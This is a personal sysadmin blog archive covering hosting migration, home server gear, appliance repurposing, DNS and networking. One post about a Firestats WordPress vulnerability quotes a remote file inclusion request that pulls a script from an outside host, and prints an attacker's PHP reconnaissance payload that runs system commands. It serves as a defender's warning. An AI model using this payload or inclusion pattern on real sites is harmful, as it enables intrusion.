Adventures in hosting

March 21st, 2010 No comments

Recently I decided to go into the hosting business. Not in a big way mind you. Just to cover the costs of hosting primarily with perhaps enough left over for a night on the town once a month or to pay the phone bill.

As it happens I was lucky enough in that I had two clients ready to go with over 100 sites each. Starting up a business without having to look for clients is an absolute luxury especially in the middle of one of the worst recessions this country has ever seen. After making all the agreements with my future clients it was time to come up with a concrete migration plan.

Before a single site could be migrated several things needed to be taken into consideration:

  • Hardware
  • Software (Operating System and Control Panel)
  • Support/Knowlegebase/Helpdesk
  • Bandwidth requirements
  • Data import/migration/compatibility

The hardware was the easiest. I had a spare Dell poweredge 1850 hanging around here at home doing nothing with a not too inconsiderate 6GB of RAM.  The operating system was going to be a simple matter too. It was going to be Linux or nothing. However which Linux distribution to choose?

Choosing the Linux distrubution was going to be directly related to my choice of control panel software. I wrote here sometime back about Virtualmin and I decided that it would be absolutely perfect for my control panel requirements. Having decided on the control panel software it was now up to me to choose between CentOS or Ubutu 8.04LTS as the host OS. In the end out of familiarity I opted for Ubuntu.

One of the key reasons for choosing Virtualmin was its ability to import backups from cPanel. As I would be migrating almost 200 sites from a cPanel server in the U.S. the ability to seamlessly migrate would be an absolute bonus. Another important reason was that the control panel interface itself is very easy to use. Considering that my two future clients were coming from years of using cPanel I was confident that they would easily find their way around Virtualmin.

In February I installed the server into the datacentre and pulled across a couple of cPanel backups to test the import functionality. Of primary concern to me was the existing server was running CentOS and using Exim as its MTA. The new server was the already mentioned Ubuntu and I had decided on Postfix as the MTA. In addition the home folders of the existing server were split between two disks mounted as /home and /home2

So I pulled across two backups, one with /home as its location on the old server and the other with /home2, used the import function and in about 5 minutes both sites had been migrated flawlessly.

I couldn’t have been that lucky I thought to myself. Normally something goes awry especially when there are significant differences in software as well as software versions. I poked around all the config files and was astonished to see that everything looked as it should be.

Over the next week I made out a schedule for migration and before long all sites were up and running. My clients were happy as too were my clients clients. The only issues that cropped up were minor and were as a result of differences in the way Virtualmin handles user accounts compared to cPanel.

So that was over a month ago and with everyone happy I can reflect on what was accomplished. Most notably was there anything I could have done differently or more efficiently.

As it happens yes, there was something I could have done had I thought about it.

The hardware of the server is absolutely overkill for what it is doing. 6GB of RAM is way too much. Over the past month the most I have ever seen in use was just short of 800MB however having lots of free RAM is not a bad thing as Linux likes to use lots of it for cache.

The load on the old server was constantly around the 1.00 to 2.50 mark, the new server with it’s dual core Xeons is barely even breaking a sweat with load averages between 0.03 and 0.12.

What I should have done, and it’s obvious now, is that I should have installed a hypervisor like VMware ESX server and paritioned the physical machine in to three virtual machines. One for each of my two clients and the third for myself.

In any event I have another Poweredge 1850 and a pair of 1750′s that I intend on installing into the datacentre in the not too distant future so now it is time to start planning for that.

To finish off here’s a screenshot:

What’s my Setup?

December 26th, 2009 No comments

Over at Tiernan’s blog he asks “what’s your setup?” I’ve decided to take him up on his question and although being unemployed for the past two years means my setup is nowhere near as powerful as his, nonetheless it’s not pretty bad either so here we go:

Primary Webserver:
Sun Blade 2000, 2 x 900Mhz UltraSPARC IIIi, 146GB disk space, 2GB RAM running Solaris 10

Second Webserver:
PentiumD 2.8 Ghz, 120GB disk space, 2GB RAM running Ubuntu 8.04.3

Third Webserver:
Pentium IV 3.0Ghz, 80GB disk space, 2GB RAM running Windows Server 2008

Fourth Webserver:
Xeon 2.4Ghz, 76GB disk space, 512MB RAM running Windows Server 2003

Primary Workstation:
PentiumD 2.8 Ghz, 768GB disk space, 3GB RAM, 512MB nVidia QuadroFX4400 running XP

Primary Fileserver:
Pentium IV 2.66Ghz, 500GB disk space, 1GB RAM running Windows Server 2008

E-mail/Groupware server:
Xeon 3.0Ghz, 146GB disk space, 1GB RAM running Ubuntu 6.04LTS and Zimbra

E-mail Gateway:
Celeron 2ghz, 40GB disk space, 1GB RAM running CentOS 5.0. Physical server converted from virtual appliance.

Reverse Proxy Server:
Pentium III 700Mhz, 40GB disk space, 512MB RAM running OpenBSD 4.5 and Squid 2.7

Outgoing Proxy server:
Sun Netra T1-120, 500Mhz UltraSPARC II, 36GB disk space, 2GB RAM running Solaris 10 and Squid 2.7

Primary Laptop:
Apple MacBook, 2.16Ghz Core2 Duo, 120GB disk space, 2GB RAM running OS X 10.5

Secondary Laptop:
Toshiba, 1.2Ghz Celeron, 40GB disk space, 384MB RAM running Ubuntu 9.10 for WiFi testing.

I have a few more odds and ends that are only occasionally in use. I have two more Sun Netra T1s, An HP 9000, L2000 (rp5420) and a couple of Pentium IIIs that are occasionally used for testing.

At the moment I would kill for a Core i7 setup but sadly funds are low at the moment and will be for the foreseeable future unfortunately!

Categories: General, Hardware Tags: ,

How to put an old security appliance to work

November 14th, 2009 2 comments

UbuntuLogoWay back towards the end of August I inherited some fairly half decent equipment. Among them were two Symantec  5420 Security Appliances. I took them despite not knowing what it was that I was going to do with them. After a while I simply forgot about them until I decided yesterday to do something.

As the licenses had expired they weren’t much use as a security appliance so first things first was to take the cover off and have a gander inside. As I suspected an €8,000 from Symantec would of course be made from the cheapest parts available. The motherboard was from a company I had never heard of in all my years called iWill. Any references on the web point to them no longer existing. The CPU is a 2Ghz Celeron and it had 512MB RAM and a 40GB Maxtor hard disk. Connectivity wise there are 6 10/100Mbit Intel ethernet ports, two USB and one RS-232 ports. Inside on a riser board is a PCI slot however fitting a normal PCI card such as a display adapter s out of the question as the IDE cable would block even the shortest ones and besides, VGA cards are not supported! In the second IDE slot is a 16MB SSD.

So what was I going to do to get a new OS up and running on it? I came across a forum post from a guy who managed to get pfsense (FreeBSD) installed on it but unfortunately his instructions were a bit lacking. Out of curiosity I hooked a console cable up to the RS-232 port and opened a terminal where I was quite pleased to be greeted by a login prompt. I logged in using the username admin with the password I got from the LED panel on the front and lo and behold I was in a root shell. I guessed that Symantec’s software probably ran on one of the BSD’s or Linux from experience with Nokia Checkpoint which ran NetBSD I think.

Anyway I guessed correctly, the 5420 was running RedHat Linux 7.1. From the console I was able to garner a bit more about the hardware. In addition to the basic stuff I mentioned earlier there is a Broadcom Cryptographic Accelerator CPU on board. But back to my immediate problem. How to get another OS on it. After pondering for a few moments I decided to try and see if taking the disk out and sticking it into a spare PC and setting it up from there would work. I dusted off my trusty Optiplex Gx1 circa 1999 and proceeded to install Ubuntu 9.10 on the disk.

Before I stuck the disk back in the 5420 I made sure that I could access a shell via console cable. Thankfully there is some excellent documentation on the Ubuntu help site and in no time I was able to access the Dell via console cable and have access to the Grub boot menu on boot up as well.

Back into the 5420 did the disk go, console cable hooked up, terminal open and time to power up. To my absolute delight there was the Grub boot menu. I hit enter and up it loaded. Perfect! Except for one thing. I had no network access. Half way through diagnosing this the whole thing just froze on me so I rebooted. Not long after rebooting it froze again. It was then I remembered that the guy who installed pfsense on his one mentioned problems with ACPI.

Unfortunately as it would freeze up so quickly I was unable to fix it from a terminal so I had no other choice but to take the disk out and shove it back into the Dell again. Ubuntu 9.10 has a lot of things moved about and the new version of Grub had me a bit confused for a while but finally I got ACPI disabled and everything is working perfectly.

Being headless they aren’t much good for anything other than possibly their original intention as a security appliance. However I decided to set up one of them as a dedicated monitoring server running ntop and Munin. For that it is absolutely perfect!

2008 a DNS oddity

October 29th, 2009 2 comments

win2008Recently I have upgraded all bar one of my Windows servers to server 2008. This included upgrading a Windows 2003 Active Directory controller. It was a pleasant surprise to discover that everything went perfectly well with absolutely no initial issues. However after a couple of days one very odd issue began rearing its head.

My Windows 2008 DNS server (PDC upgraded from 2003) occasionally decided that it can no longer resolve .uk domains. It doesn’t matter if it is .co.uk, ac.uk or whatever .uk it just flat out refuses to resolve them unless I restart the service.

A second Windows 2008 server that I installed DNS on as a secondary server has the exact same issue. After a couple of days it will just stop resolving .uk domains!

After plenty of head scratching and searching I finally discovered this article on technet.

It requires a bit of registry editing but what puzzles me is that if the problem has been fairly well known for almost a year (that technet article is dates 29th January 2009) why is the fix still a registry hack?

Playing with Powerline Ethernet

September 3rd, 2009 6 comments

I was out in Lidl a few months back and picked up a pair of powerline ethernet adapters for €40. Our house is a couple of hundred years old and has walls that are around half a metre thick. This means that my wireless access point is inaccessible in some parts of the house so I figured that the powerline adapters would be perfect to setup an access point at the other end of the house. My cunning plan worked much better than I hoped for.

A quick bandwith test with my laptop connected directly to the adapter gave transfer rates of 40Mbit when copying an iso image from one of my file servers. I hooked up the access point and all was well. Latency is quite good too and the transfer rates have been consistent. All told I was pleased.

However as I now have so much equipment crammed into such a small room here at home, things have been getting a little toasty and with the addition of a Dell Poweredge 1750 humming along with my Poweredge 2800 things have been getting exceptionally noisy as well. There is only one course of action and that is to move them out of my computer room to somewhere else. Unfortunately there is nowhere else in the house to put them as the noise is very hard to escape from.

The only option I could think of is a garage that we own which is about 250m from our house. It is nice and dry, secure and more importantly cool so it would be pretty safe to install a rack in there. Unfortunately it is too far to run an ethernet cable too and I don’t  have line of sight to set up a wireless connection. But the garage is connected to our domestic electricity supply so I figured I would do a quick test to see if my cheap powerline ethernet connectors would work up there.

Armed with my laptop and one of the adapters I headed off to the garage and plugged in. Almost instantly the adapter found its partner back at home and my laptop picked up its IP address and lo and behold I was now connected to my LAN.

Browsing the net seemed very snappy indeed but if I was going to install a rack there I needed to find out if I would have enough bandwidth there to make it worth my while. So I downloaded the same iso image that I used for my first test and was mildly surprised with the results. The transfer rate as I thought it would had dropped significantly but it is a solid 12Mbit which is quite usable indeed.

My plan is to move my web and mail servers up there and keep my file servers back in my home office. All I need now is a rack!

Various updates

August 25th, 2009 No comments

It’s been absolutely ages since I last wrote here and I had been meaning to do so for some time. Since my last entry I have been tinkering away with my setup as I do on a regular basis and plenty of things have changed here on the back end. I suppose I will begin with my my connection and move up the chain from there.

First up is a new router. I picked up a nice Cisco 837 for a very reasonable price. I had a bit of fiddling to get it up and running with eircom broadband but I got there in the end and I have documented the procedure over on my wiki.

Next up is my reverse proxy. It is still running on the same hardware but I decided to move from Linux over to OpenBSD. My primary reason for this is that I was getting sick and tired of Linux iptables. In addition I concluded that Squids performance wasn’t optimal either. A move to OpenBSD seems to have resolved both those issues for me. PF on BSD is very configurable and easy to understand as well. Needless to say I have documented my experiences with PF over on my wiki also.

I’ve also gotten my hands on some new hardware. Well new hardware to me that is. I picked up three Sun Netra T1 servers, a Dell PowerEdge 1750 and two Symantec 5420 Firewall appliances.

So far I have been busy setting up the three Netras. They don’t have CD-ROM drives or display adapters so I had to install them over the network which was a process that was actually relatively simple. However it was only simple in that I already have a couple of other Sun machines here one of which I was able to use as an install server. Of course I have this process documented on my wiki also.

I haven’t decided what I will use the Netras for yet. One of them seems to have CPU problems and has been cannabilised to increase the specs. of the other two. They have 500Mhz UltraSparc IIe CPUs so by todays standards are not at all that powerful but they do draw very little power, certainly less than a Pentium IV machine so I may set them up as file servers. Initially I was hoping to install OpenBSD on one of them to use as my reverse proxy but unfortunately an OpenBSD network install does not seem to be as straight forward as Solaris.

The Poweredge 1750 I had hoped to set up as a webserver running either IIS or Apache. Unfortunately it only has 512MB of RAM so until I get some more for it that rules out Server 2008. However it is incredibly loud and that rules out keeping it running in my computer room. I am currently planning on setting up a dedicated computer room as it were in another part of the house so check back here for update on that.

Firestats WordPress Exploit

June 13th, 2009 4 comments

The vulnerability described below has been resolved in Firestats 1.6.2 which you can download from http://firestats.cc/wiki/Download

Disclaimer: I have nothing at all to do with the development of Firestats. I am merely an end user.

Over the last few hours I have been watching a major attempt at cracking both of my WordPress installations. A quick investigation tells me that the cracking attempts are looking for this vulnerability in Firestats.

At present there has been over 600 attempts from servers all over the globe which attempt to fetch the path to firestats-wordpress.php and exploit it using a script hosted elsewhere.

A sample from my logs looks like this:

http://tech.sweetnam.eu/tag/wp-content/plugins/firestats/firestats-wordpress.php?fs_javascript=http://www.x-pronet.com/board/forum/fx29id.txt??

The scripts themselves seem to have two versions. The most common one like above has the following contents:

<?php /* Fx29ID */ echo(“FeeL”.”CoMz”); die(“FeeL”.”CoMz”); /* Fx29ID */ ?>

The other one contains the following:

<?php
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) {
return sprintf(“%d b”, $number); }
if($len >= 4 && $len <=6) {
return sprintf(“%0.2f Kb”, $number/1024); }
if($len >= 7 && $len <=9) {
return sprintf(“%0.2f Mb”, $number/1024/1024); }
return sprintf(“%0.2f Gb”, $number/1024/1024/1024); }

echo “Osirys<br>”;
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo “0sirys was here and also is a fucking gay..<br>”;
echo “uname -a: $un<br>”;
echo “os: $os<br>”;
echo “id: $id1<br>”;
echo “free: $free<br>”;
echo “used: $used<br>”;
echo “total: $all<br>”;
exit;

All I can recommend at the moment is removing firestats from your WordPress installation. It seems to be the only way to be sure for the moment.

Microsoft Web Platform Installer an IIS ‘must have’

April 12th, 2009 No comments

Microsoft have played a bit of a blinder. I’ve always found it a nightmare to set up ASP.net applications on IIS. Even getting PHP up and running and playing nice on IIS can be an absolute nightmare at times. No more however. If you are running IIS 6 or 7 then it is well worth your while installing Microsoft’s Web Platform Installer.

At the moment I’m using version 2 which is in beta but it is fine for production use albeit with one very unusual and weird quirk. If you try to install a package it will throw a wobbly if you are not in the Pacific, US and Canada time zone. So change the time zone before installing a web app and don’t forget to change it back once you are finished.

Rather than wax on about it myself I will just rehash Microsoft’s blurb:

The Microsoft Web Platform Installer 2.0 (Web PI) is a free tool that makes it simple to download, install and keep up-to-date with the latest components of the Microsoft Web Platform, including Internet Information Services (IIS), SQL Server Express, .NET Framework and Visual Web Developer. In addition, install popular open source ASP.NET and PHP web apps with the Web PI.

If you have to administer or are setting up an IIS server then it’s an essential install!

My iPhone is kaput already

April 7th, 2009 6 comments

I only bought it in November and two days ago the microphone stopped working. I could hear others when they called but they couldn’t hear me.

Yesterday a friend who called claimed that my voice sounded like that of a Dalek from Doctor Who. So now I’m left with what is essentially an iPod touch. All going well it should be under warranty given that it is only 5 months old.

Other strange glitches started to appear lately as well. The wi-fi connection kept dropping on me despite being in the same room as the router. Applications would start to hang with alarming regularity requiring frequent reboots. Grr.. extremely annoying so it is.

Categories: Apple, Hardware, iPhone Tags: ,

IBM and Sun courting

March 18th, 2009 No comments

The Wall Street Journal has an article today that confirms that IBM is having discussions with Sun over a possible acquisition. This isn’t the first time that IBM have had discussions with Sun but given the current economic climate it might be a reall possibility this time around. Also it would potentially be an easy sell to current Sun shareholders who have seen their shares decline steadily in value over recent years.

What will this mean for the technology industry? Well both IBM and Sun overlap in quite a few areas so here are the ones I can think of off the top of my head:

  • IBM PowerPC and Sun SPARC CPU’s
  • IBM Lotus Symphony and Star/OpenOffice
  • IBM DB2 and Sun’s MySQL
  • IBM AIX and Sun Solaris
  • IBM Storage and Sun Storage/StorageTek

The crown jewels of a take over would probably be Java and MySQL but IBM swallowing up Sun would create more than a few jitters for EMC who presently rule the storage market.

Of course with the potential acquisition of Sun by IBM it will inevitiably compared to the HP take over of Compaq. Bot HP and Compaq were in competition with each other in the enterprise computing market with HP’s PA-RISC based servers competing with Compaq’s Alpha’s (in turn acquired by Compaqs take over of DEC).They also had competing operating systems with HP’s HP-UX vs Compaq Tru64.

Of course it wasn’t long after that merger was completed when HP killed off Alpha and Tru64.

Would IBM kill off SPARC and Solaris? I would speculate that they might kill off SPARC but focus purely on Solaris for x86. It might make sense for IBM to keep Solaris on x86 as they currently don’t have an x86 version of AIX. This is all conjecture of course and as the talks are at an early stage the deal might fall through yet.

Time will tell.

Categories: General, Hardware, Software, Sun Tags: , , ,